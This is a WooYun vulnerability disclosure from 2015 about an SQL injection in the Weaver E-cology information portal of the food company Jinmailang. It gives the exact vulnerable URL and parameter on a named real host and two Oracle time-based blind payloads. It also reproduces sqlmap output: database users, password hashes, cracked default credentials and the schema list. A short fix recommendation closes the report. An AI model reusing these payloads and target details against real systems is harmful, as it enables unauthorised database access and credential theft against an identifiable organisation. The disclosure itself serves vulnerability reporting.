当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0114961

漏洞标题:今麦郎某系统SQL注入漏洞

相关厂商:今麦郎

漏洞作者: TT向上

提交时间:2015-05-19 17:08

修复时间:2015-07-03 17:10

公开时间:2015-07-03 17:10

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:11

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-19: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-07-03: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

今麦郎食品集团信息门户系统SQL注入

详细说明:

今麦郎食品集团信息门户系统SQL注入。

漏洞证明:

访问今麦郎饮品有限公司官网,http://www.jmlyp.com/,右上角信息门户系统。
http://home.jmlyp.com/login/Login.jsp?logintype=1

hom1.png


登陆页面测试一下是否有注入,然后跳转到存在注入页面;
http://home.jmlyp.com/wui/theme/ecology7/page/login.jsp?templateId=101&logintype=1&gopage=&languageid=7&message=55

home.jmlyp-1.png


用的系统实际是泛微E-COLOGY,templateId参数存在SQL注入,直接放到sqlmap里面跑即可。
oracle盲注,跑起来很慢。
sqlmap信息。dba权限,Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - 64bi版本,

Parameter: templateId (GET)
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: templateId=101' AND 3194=DBMS_PIPE.RECEIVE_MESSAGE(CHR(109)||CHR(76)||CHR(80)||CHR(114),5) AND 'FKyh'='FKyh&logintype=1&gopage=&languageid=7&message=55
---
web application technology: JSP
back-end DBMS: Oracle
banner: 'Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - 64bi'
current user: 'COLOGY'
current schema (equivalent to database on Oracle): 'COLOGY'
hostname: 'cology.jmlyp.com'
current user is DBA: True


database management system users

database management system users [22]:
[*] ANONYMOUS
[*] COLOGY
[*] CTXSYS
[*] DBSNMP
[*] DIP
[*] DMSYS
[*] EXFSYS
[*] MDDATA
[*] MDSYS
[*] MGMT_VIEW
[*] OLAPSYS
[*] ORDPLUGINS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SI_INFORMTN_SCHEMA
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB
database management system users password hashes:
[*] ANONYMOUS [1]:
password hash: anonymous
[*] COLOGY [1]:
password hash: 02B594CB6E4804F3
clear-text password: COLOGY
[*] CTXSYS [1]:
password hash: 71E687F036AD56E5
clear-text password: CHANGE_ON_INSTALL
[*] DBSNMP [1]:
password hash: FFF45BB2C0C327EC
clear-text password: ORACLE
[*] DIP [1]:
password hash: CE4A36B8E06CA59C
clear-text password: DIP
[*] DMSYS [1]:
password hash: BFBA5A553FD9E28A
clear-text password: DMSYS
[*] EXFSYS [1]:
password hash: 66F4EF5650C20355
clear-text password: EXFSYS
[*] MDDATA [1]:
password hash: DF02A496267DEE66
clear-text password: MDDATA
[*] MDSYS [1]:
password hash: 72979A94BAD2AF80
clear-text password: MDSYS
[*] MGMT_VIEW [1]:
password hash: 442167C25FAC883C
[*] OLAPSYS [1]:
password hash: 3FB8EF9DB538647C
clear-text password: MANAGER
[*] ORDPLUGINS [1]:
password hash: 88A2B2C183431F00
clear-text password: ORDPLUGINS
[*] ORDSYS [1]:
password hash: 7EFA02EC7EA6B86F
clear-text password: ORDSYS
[*] OUTLN [1]:
password hash: 4A3BA55E08595C81
clear-text password: OUTLN
[*] SCOTT [1]:
password hash: F894844C34402B67
clear-text password: TIGER
[*] SI_INFORMTN_SCHEMA [1]:
password hash: 84B8CBCA4D477FA3
clear-text password: SI_INFORMTN_SCHEMA
[*] SYS [1]:
password hash: 8A8F029737A9097A\x03
[*] SYSMAN [1]:
password hash: 2CA614501F09FCCC
clear-text password: ORACLE
[*] SYSTEM [1]:
password hash: 2D594E86F93B17A1
clear-text password: ORACLE
[*] TSMSYS [1]:
password hash: 3DF26A8B17D0F29F
clear-text password: TSMSYS
[*] WMSYS [1]:
password hash: 7C9BA362F8314299
clear-text password: WMSYS
[*] XDB [1]:
password hash: 88D8364765FCE6AF
clear-text password: CHANGE_ON_INSTALL


数据库信息,后面没再跑,太慢了

Parameter: templateId (GET)
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: templateId=101' AND 7017=DBMS_PIPE.RECEIVE_MESSAGE(CHR(112)||CHR(65)||CHR(85)||CHR(106),5) AND 'ekFf'='ekFf&logintype=1&gopage=&languageid=7&message=55
---
web application technology: JSP
back-end DBMS: Oracle
available databases [16]:
[*] "COLOGY\X05\X11"
[*] "SYSMAN\X11"
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] ORDYYS
[*] OUTLN
[*] SCOTT
[*] SYS
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB


验证到此为止,应该可以说明问题了

修复方案:

过滤,审计泛微版本

版权声明:转载请注明来源 TT向上@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝